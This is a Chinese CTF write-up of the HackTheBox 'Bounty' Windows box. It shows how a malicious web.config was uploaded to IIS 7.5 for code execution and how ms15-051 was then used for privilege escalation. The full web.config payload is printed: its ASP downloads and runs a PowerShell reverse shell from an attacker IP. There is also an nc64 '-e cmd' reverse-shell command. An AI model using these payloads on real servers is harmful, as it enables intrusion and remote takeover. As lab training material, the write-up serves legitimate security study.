hackthebox-Bounty (考点:上传/IIS7.5安全/windows)

1、nmap

在这里插入图片描述
就一个80,没啥别的,扫出来显示是iis7.5,说明很可能这就是个突破口&考点

2、IIS 渗透 & web.config

因为是iis,所以对于asp&aspx文件是要重视的,在拿dirbuster扫时也要添加这俩后缀文件名

扫出
在这里插入图片描述
打开看第一个是上传,然后在第二个里读取

在这里插入图片描述

经验证,随便传图片,读取成功。那么突破思路就是上传了。
在这里插入图片描述
但我试了很多php和aspx,都没用,让人郁闷

只好搜iis7.5 rce upload之类的关键词。

只能说谷歌可能确实比百度爽。。外国佬做题还是有优势,一是用谷歌方便,二是英语母语方便,很容易读懂那些漏洞文档,三是先进技术和文档还是在国外多些。。

一搜就看到web.config,这是个新思路
在这里插入图片描述
然后我找到了这个,文章里还有个超链接,是从另一个大神那里学到的方法。

试了试,我再把cmd命令改一改,直接弹shell。因为是Windows,所以用powershell拿shell方便些,参考这个

Windows的渗透方法大同小异,powershell可参考之前写的标题带(考点:windows)靶机文章,比如这个box

在powershell弹shell的那里,改成自己的ip。最后文件命名为web.config.通过靶机的网页传上去。最后打开10.10.10.93/uploadedfiles/web.config

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<% Response.write("-"&"->") %>

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.3/Invoke-PowerShellTcp.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>

<% Response.write("<!-"&"-") %>
-->

本机打开监听,收到。

3、提权

后面都是老套路,用夏洛克ps1扫漏洞,然后我又看到ms15-051,之前的靶机用过好多次这个,屡试不爽。这次依然有效。systeminfo查看靶机信息是64位,就用64位的ms15-051

开启smb服务传输,以前文章讲过好多次了,准备好恶意程序和nc64,靶机里直接执行

\\10.10.14.3\share\ms15-051x64.exe "\\10.10.14.3\share\nc64.exe -e cmd 10.10.14.3 443"

收到搞定。

在这里插入图片描述
在这里插入图片描述


版权声明:本文为weixin_45527786原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。